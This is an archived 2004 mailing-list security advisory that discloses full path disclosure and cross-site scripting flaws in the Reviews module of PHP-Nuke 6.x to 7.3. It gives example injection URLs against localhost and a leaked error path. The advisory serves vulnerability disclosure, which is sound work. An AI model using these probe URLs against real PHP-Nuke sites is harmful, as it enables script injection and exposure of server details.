OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Multiple vulnerabilities PHP-Nuke

From: Dark Bicho (k1ll3rb0yhotmail.com)
Date: Mon Jun 07 2004 - 16:30:38 CDT

original advisory : http://bichosoft.webcindario.com/advisory-05.txt

-------------------------------------------------------------------------------------------------

                            :.: Multiple vulnerabilities PHP-Nuke :.:

  PROGRAM: PHP-Nuke
  HOMEPAGE: http://phpnuke.org/
  VERSION: 6.x, 7.2, 7.3
  BUG: Multiple vulnerabilities
  DATE: 14/05/2004
  AUTHOR: DarkBicho
          web: http://www.darkbicho.tk
          team: Security Wari Proyects <www.swp-zone.org>
          Email: darkbichoperu.com

-------------------------------------------------------------------------------------------------

1.- Affected software description:
    -----------------------------

    Php-Nuke is a popular content management system, written in php by
    Francisco Burzi.

2.- Vulnerabilities:
    ---------------

A. Full path disclosure:

    This vulnerability would allow a remote user to determine the full
    path to the web root directory and other potentially sensitive
information.

    :.: Examples:

    
http://localhost/nuke1/modules.php?name=Reviews&rop=showcontent&id='DarkBicho

    Warning: date(): Windows does not support dates prior to midnight
(00:00:00),
    January 1, 1970 in c:\appserv\www\nuke1\modules\Reviews\index.php on
line 527

B. Cross-Site Scripting aka XSS:

    :.: id :

    *
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=a

    <input type=hidden name=id value='>

    :.: title :

    *
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=a

    :.: Examples:

    
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='<h1>DarkBicho</h1&title=a
    
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=<h1>DarkBicho</h1>

3.- SOLUTION:
     ¨¨¨¨¨¨¨¨
    Vendors were contacted many weeks ago and plan to release a fixed
version soon.
    Check the PHP-NUKE website for updates and official release details.

4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D
    "EL PISCO ES Y SERA PERUANO"

5.- Contact
    -------

        WEB: http://www.darkbicho.tk
        EMAIL: darkbichoperu.com

-------------------------------------------------------------------------------------------------
                                ___________ ____________
                               / _____/ \ / \______ \
                               \_____ \\ \/\/ /| ___/
                              / \\ / | |
                             /_______ / \__/\ / |____|
                             \/ \/

                                Security Wari Projects
                                  (c) 2002 - 2004
                                    Made in Peru

----------------------------------------[ EOF
]----------------------------------------------

_________________________________________________________________
Consigue aquí las mejores y mas recientes ofertas de trabajo en América
Latina y USA: http://latam.msn.com/empleos/